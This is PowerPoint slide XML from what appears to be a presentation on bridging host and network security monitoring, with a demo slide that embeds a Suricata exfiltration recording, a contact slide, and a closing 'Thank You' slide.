            <a:off x="1885041" y="2128814"/>
            <a:ext cx="12762340" cy="7373813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="11501"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9584" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Demo Time: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="11501"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9584" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>A PICTURE IS WORTH A THOUSAND WORDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 5"/>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5320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19132242" y="665965"/>
              <a:ext cx="2584426" cy="342340"/>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16/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 8"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11201337" y="406326"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="AutoShape 11"/>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2" name="AutoShape 12"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E81772-1C4F-F92D-3402-7EFDB7038CF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14071276" y="1251470"/>
            <a:ext cx="3009524" cy="45047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54DA1-26B5-2EC8-9583-3B0B0C2D659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E25E575-E745-4759-E02F-FAD4044B7C69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-38100"/>
            <a:ext cx="18288000" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="24384000" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2C4DE9-09E9-2D46-4D30-06D17ADF6EBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="24384000" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B740A6AE-3EC0-A302-7709-10961D94F122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="114300"/>
            <a:ext cx="12762340" cy="1413849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="11501"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Recording</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3528C732-9B61-FB04-3398-1288CE689121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15612B7D-3A8A-343E-0ED8-290BDA16F5E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC92F4E2-6E2C-F9C5-3814-5F76C3479555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19132242" y="665965"/>
              <a:ext cx="2584426" cy="342340"/>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16/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FB491E-AA4F-CECD-D48F-39A788EC025D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{236F8C87-2CA0-F650-F84B-9B987A3ED18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11201337" y="406326"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="AutoShape 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018F4ACA-EC99-3302-6E66-AE9C61DB5CE6}"/>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2" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FB90B38-9B94-FADD-EE7C-819D0042C742}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="suricata_exfil_example">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF29C2EB-D058-5F69-3C17-D4AB8DF3507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8288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41012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52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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Freeform 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112448" y="3898321"/>
            <a:ext cx="303884" cy="434120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="303884" h="434120">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="303884" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303884" y="434120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="434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73945" y="4808088"/>
            <a:ext cx="380890" cy="380890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="380890" h="380890">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="380890" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380890" y="380890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3808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86411" y="5776106"/>
            <a:ext cx="355960" cy="244722"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="355960" h="244722">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="355959" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355959" y="244722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2447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66954" y="7529197"/>
            <a:ext cx="394872" cy="394872"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="394872" h="394872">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="394872" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394872" y="394872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3948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041128" y="6574875"/>
            <a:ext cx="446524" cy="401872"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="446524" h="401872">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="446524" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446524" y="401872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4018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7" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10728984" y="2019789"/>
            <a:ext cx="6873216" cy="68732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1AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11109984" y="1713057"/>
            <a:ext cx="6873216" cy="68732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25046" r="-25046"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1041128" y="2021386"/>
            <a:ext cx="7793760" cy="1002241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2052677" cy="263965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2052677" cy="263965"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2052677" h="263965">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2052677" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052677" y="263965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="263965"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="2052677" cy="311590"/>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1295318" y="2080652"/>
            <a:ext cx="8928759" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5728" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>CONTACT US</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804645" y="3848065"/>
            <a:ext cx="6061927" cy="394275"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Crownsville, MD, USA 21032</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804645" y="4773688"/>
            <a:ext cx="4892954" cy="415290"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>‪(410) 946-6074</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804645" y="5662247"/>
            <a:ext cx="4892954" cy="394275"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>wtaylorsiii788@gmail.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804644" y="7443893"/>
            <a:ext cx="9549155" cy="394275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>https://github.com/tskinnerarlo/Bridging-Host-and-Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804645" y="6539591"/>
            <a:ext cx="4892954" cy="394275"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>TedTe73126</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 21"/>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18/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="AutoShape 22"/>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24" name="Freeform 24"/>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25" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6010727" y="388382"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="AutoShape 26"/>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7" name="AutoShape 27"/>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28" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7549323" y="8776202"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="AutoShape 29"/>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30" name="AutoShape 30"/>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
        <p:nvSpPr>
          <p:cNvPr id="31" name="Freeform 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3476141" y="5677406"/>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32" name="Freeform 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17666902" y="1661306"/>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1219849" y="2730516"/>
            <a:ext cx="12260715" cy="4360609"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3229160" cy="1148473"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3229159" cy="1148473"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3229159" h="1148473">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3229159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3229159" y="1148473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1148473"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="3229160" cy="1196098"/>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1727341" y="3000881"/>
            <a:ext cx="12804764" cy="884858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5728" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Thank You</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727341" y="6115556"/>
            <a:ext cx="12804764" cy="394275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>— Questions ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
